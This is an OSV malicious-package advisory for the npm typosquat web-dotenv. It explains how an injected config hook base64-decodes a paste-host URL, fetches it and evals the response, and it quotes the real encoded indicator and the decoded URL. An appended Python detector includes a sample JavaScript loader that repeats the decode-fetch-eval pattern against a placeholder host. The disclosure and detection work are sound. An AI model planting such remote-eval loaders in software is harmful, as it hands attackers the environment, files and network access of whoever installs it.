MAL-2026-4728

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/web-dotenv/MAL-2026-4728.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4728
Published
2026-05-25T15:07:03Z
Modified
2026-05-26T06:03:07.422628105Z
Summary
Malicious code in web-dotenv (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (edd19476eeb1c31707abe6fac6f52dbd1950a0dc25f4854ea5269d6400f8ea37)

web-dotenv impersonates the widely-used dotenv package: its package.json copies dotenv's repository (git://github.com/motdotla/dotenv.git) and homepage (github.com/motdotla/dotenv#readme), and the source is otherwise a verbatim copy of dotenv with one injected function. The package's primary documented entry point, config(), calls configfix() in lib/main.js, which base64-decodes the string CWh0dHBzOi8vd3d3Lmpzb25rZWVwZXIuY29tL2IvVktVTkk= to https://www.jsonkeeper.com/b/VKUNI, fetches that URL via axios, and passes the response body directly to eval. jsonkeeper.com is an anonymous, mutable paste host: the attacker can swap the executed JavaScript at any time without republishing the package. Any project that installs web-dotenv expecting dotenv-compatible behavior and calls .config() (i.e., the normal first line of any dotenv consumer) will execute attacker-controlled code in the Node process, with full access to environment variables, filesystem, and outbound network. Three independent attack signals stack: typosquat of a top-tier package, base64-obfuscated URL, and remote eval of mutable third-party content.
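The three signals described above (a repository field naming a different project, a base64 literal that decodes to a URL, and eval applied to a network response) can be checked mechanically before a package is allowed into a build. The following Python triage script is an added example, not code from the advisory, the ossf/malicious-packages repository or the package itself. Its inputs are constructed stand-ins: the package.json mimics the mismatched repository field, and the encoded string is a placeholder URL rather than the indicator quoted above.

```python
import base64
import binascii
import json
import re

# Constructed sample inputs for this example; they are not the contents of the
# real web-dotenv package. The package.json mimics a repository field that
# points at a different project, and the JS mimics the decode-fetch-eval
# pattern the advisory describes.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "web-dotenv",
    "version": "1.0.2",
    "repository": {"type": "git", "url": "git://github.com/motdotla/dotenv.git"},
})

# Constructed placeholder URL, base64-encoded the way the advisory describes,
# used in place of the advisory's real indicator.
PLACEHOLDER_URL = "https://paste.example.invalid/b/PLACEHOLDER"
ENCODED_URL = base64.b64encode(PLACEHOLDER_URL.encode()).decode()
SAMPLE_MAIN_JS = f"""
const axios = require('axios');
function configfix() {{
  const target = Buffer.from('{ENCODED_URL}', 'base64').toString();
  return axios.get(target).then((r) => eval(r.data));
}}
"""

# Quoted runs long enough to be worth decoding; short tokens are ignored.
BASE64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
EVAL_CALL = re.compile(r"\beval\s*\(")
NETWORK_CALL = re.compile(r"\b(?:axios|fetch|https?\.(?:get|request))\b")


def find_base64_urls(js_source):
    """Return (literal, decoded_url) for each quoted base64 literal that decodes to a URL."""
    hits = []
    for literal in BASE64_LITERAL.findall(js_source):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or a binary payload: out of scope here
        decoded = decoded.strip()  # tolerate leading whitespace in the decoded string
        if decoded.startswith(("http://", "https://")):
            hits.append((literal, decoded))
    return hits


def has_remote_eval(js_source):
    """True when the file both makes a network call and passes something to eval()."""
    return bool(EVAL_CALL.search(js_source) and NETWORK_CALL.search(js_source))


def repository_mismatch(package_json_text):
    """Return (package_name, repo_name) when the repository URL names a different project."""
    pkg = json.loads(package_json_text)
    name = pkg.get("name", "").split("/")[-1]  # drop an npm scope such as @org/
    repo = pkg.get("repository", "")
    url = repo.get("url", "") if isinstance(repo, dict) else repo
    repo_name = url.rstrip("/").rsplit("/", 1)[-1]
    if repo_name.endswith(".git"):
        repo_name = repo_name[:-4]
    if name and repo_name and name != repo_name:
        return (name, repo_name)
    return None


def scan_package(package_json_text, js_source):
    """Combine the three signals the advisory lists; 'signals' counts how many fired."""
    findings = {
        "base64_urls": find_base64_urls(js_source),
        "remote_eval": has_remote_eval(js_source),
        "repository_mismatch": repository_mismatch(package_json_text),
    }
    findings["signals"] = sum(
        1 for value in (findings["base64_urls"],
                        findings["remote_eval"],
                        findings["repository_mismatch"]) if value
    )
    return findings


if __name__ == "__main__":
    print(json.dumps(scan_package(SAMPLE_PACKAGE_JSON, SAMPLE_MAIN_JS), indent=2))
```

Each signal on its own is a triage heuristic rather than a verdict: monorepos legitimately publish packages whose names differ from the repository name, and some loaders decode base64 for benign reasons. Seeing all three fire on the same file, as they do for the constructed sample, is the combination the advisory calls out and is worth blocking an install over.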

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "edd19476eeb1c31707abe6fac6f52dbd1950a0dc25f4854ea5269d6400f8ea37",
            "modified_time": "2026-05-25T15:07:03Z",
            "id": "IN-MAL-2026-004695",
            "import_time": "2026-05-26T05:53:06.279609533Z",
            "versions": [
                "1.0.2"
            ],
            "source": "amazon-inspector"
        }
    ]
}
References
Credits

Affected packages

Package: npm / web-dotenv
Affected ranges: 1.*
Affected versions: 1.0.2

Database specific

indicators
{
    "package_integrity": [
        {
            "hashes": {
                "sha1": "00765d9332c9419680fe81949c2c55594fbb3c87",
                "sha512_sri": "sha512-mwwJes5qK/gDhbP3K67Xo6EIhTZlmX5vECr+TGuNOJfjMkvLgWF/aSPSfYZ+sfGmpSFq9VnlU3XE5oXDsEEPeg=="
            },
            "filename": "web-dotenv-1.0.2.tgz"
        }
    ],
    "evidence_files": [
        {
            "path": "lib/main.js",
            "sha256": "5cc30e2db46bb70e043b5f7fdb2d526caa2a4fcf83806c1c08bd6f0a1559ef43",
            "tlsh": "99427204a9f9761207c3b2d2914f5019a9bac267361c9f807a8cb3d86f49e78c5e37dd"
        },
        {
            "path": "package.json",
            "sha256": "58c62d717274f3b0970a51f4b58ee6f2cfac574693790cd24f4984763bebd312",
            "tlsh": "6e31cb12c48c1d6329c67e6eb86d860296a4d61bed58bd0d338a23cd4f5d27f40fa35d"
        }
    ]
}
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/web-dotenv/MAL-2026-4728.json"